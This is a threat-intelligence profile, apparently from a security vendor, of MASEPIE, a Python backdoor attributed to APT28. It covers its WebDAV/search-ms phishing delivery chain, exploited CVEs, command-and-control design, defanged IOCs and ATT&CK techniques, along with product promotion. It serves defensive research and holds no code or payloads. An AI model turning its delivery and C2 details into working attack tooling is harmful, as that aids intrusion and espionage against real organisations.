MASEPIE
MASEPIE is a malicious Python-based downloader/backdoor associated with Russian GRU Unit 26165, widely tracked as APT28/Fancy Bear. Public reporting describes it as a previously unseen malware family used in espionage campaigns targeting Ukrainian government organizations, entities in Ukraine and Poland, French organizations, and Western logistics and technology companies involved in supporting aid delivery to Ukraine. It has also been referenced alongside other APT28 tooling including HEADLACE, STEELHOOK, and OCEANMAP.
Reported delivery methods include spearphishing emails, including messages sent from previously compromised accounts, and malicious landing pages that abuse the Windows URI handler and WebDAV staging. In one documented chain, victims were lured to DriveHQ-hosted firstcloudit[.]com subdomains that used JavaScript to invoke a Microsoft search: URI and retrieve remote .search-ms files over WebDAV. These exposed malicious LNK or ZIP payloads; opening the LNK launched a decoy document, downloaded a Python interpreter, and executed the MASEPIE payload. MASEPIE has also been cited in broader APT28 spearphishing and malware-delivery operations, including campaigns exploiting CVE-2023-38831 in WinRAR.
Functionally, MASEPIE has been described as a Python downloader and as a malicious Python script enabling elementary remote command execution and file exchange with infected systems. Documented capabilities include executing arbitrary shell commands via Python os.popen, responding to a check command with check-ok, sending files, retrieving files, and supporting persistence/data-exfiltration workflows in APT28 campaigns. Reporting also states APT28 used MASEPIE to load PowerShell scripts named STEELHOOK/Steelhook to steal Chrome or Chromium-based browser data, which was then sent to command-and-control infrastructure.
In the CERT-UA-linked December 2023 campaign, a referenced MASEPIE sample named Client.py had SHA-256 18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6. MASEPIE communicated with C2 over two raw TCP channels on high or non-standard ports, with examples including 54763 and 55555. Traffic was encrypted with AES-128-CBC using a randomly generated 16-character ASCII key transmitted in cleartext at session start. Some samples also performed HTTP beaconing to Interactsh infrastructure on oast[.]fun, and one reported sample with SHA-256 a333243927bb6956dc051ecea5f91b26a6c233b8164fafb9202e1f1e70ce045f displayed a decoy document on execution. Additional campaign artifacts included malicious .search-ms files such as mod.search-ms, calendar.search-ms, wody.search-ms, and pol.search-ms; a malicious LNK with SHA-256 19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc; shared CSS file SHA-256 2328921cd1ec88aa3dec45c3367782b7760f6a7aa615b15feaad2e34e206e2f0; decoy URL http://194.126.178[.]8/webdav/wody.pdf; and infrastructure including 194.126.178[.]8, 124.168.91[.]178, 159.196.128[.]120, and 172.114.170[.]18.
Multiple reports state the surrounding infrastructure for these operations relied heavily on compromised SOHO or Ubiquiti/EdgeOS devices, providing staging, phishing, and relay capability. High-confidence victim sectors mentioned in the content include government, defense-related organizations, logistics, transportation, IT services, and technology companies, particularly those connected to Ukraine support operations.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The Russian GRU cyber campaign also involves malware such as HEADLACE and MASEPIE, which are used for persistence and data exfiltration.
The Russian GRU cyber campaign also involves malware such as HEADLACE and MASEPIE, which are used for persistence and data exfiltration.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
In December 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) reported that Russian state cyber unit APT28 was targeting entities in Ukraine and Poland with phishing campaigns in an attempt to leverage previously unseen malware. APT28 used MASEPIE to load PowerShell scripts called Steelhook to steal Chrome browser-based data, which APT28 sent to its C2 server.
The Russian GRU cyber campaign also involves malware such as HEADLACE and MASEPIE, which are used for persistence and data exfiltration.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
5 techniques
Initial Access
"those protocol handlers can be leveraged to trigger the display of remote files made available through a WebDAV server"
A significant aspect of the campaign involves the exploitation of known vulnerabilities. The actors have weaponized multiple CVEs, including: CVE-2023-23397 in Microsoft Outlook to harvest credentials Roundcube vulnerabilities for email server access CVE-2023-38831 in WinRAR for remote code execution
In December 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) reported that Russian state cyber unit APT28 was targeting entities in Ukraine and Poland with phishing campaigns... On September 4, 2023, CERT-UA reported a phishing campaign in which BlueDelta leveraged Headlace information-stealing malware to target critical energy infrastructure in Ukraine.
Execution
7 techniques
Execution
To establish persistence on the infected system, MASEPIE loaded a backdoor called OCEANMAP that allowed for discreet command execution.
"a Python interpreter and a malicious payload script (MASEPIE) would be downloaded and executed"
The actors have weaponized multiple CVEs, including: CVE-2023-23397 in Microsoft Outlook to harvest credentials ... CVE-2023-38831 in WinRAR for remote code execution
Persistence
1 technique
Persistence
Credential Access
1 technique
Credential Access
Collection
1 technique
Collection
Command and Control
5 techniques
Command and Control
"trigger the display of remote files made available through a WebDAV server"
"Ubiquiti networks devices are being used as malicious infrastructure to stage infection files, and as command and control servers or reverse-proxies."
"MASEPIE uses two raw TCP connections to a command and control (C2) server on non-standard and high TCP ports"
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A short-lived Python downloader used as part of APT28's fragmented single-purpose toolkit.
Malware used in the campaign for persistence and data exfiltration.
Malware used by APT28 to load PowerShell scripts in a phishing campaign targeting entities in Ukraine and Poland.
MASEPIE is a malware used by APT28, designed for espionage and data exfiltration from targeted organizations.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.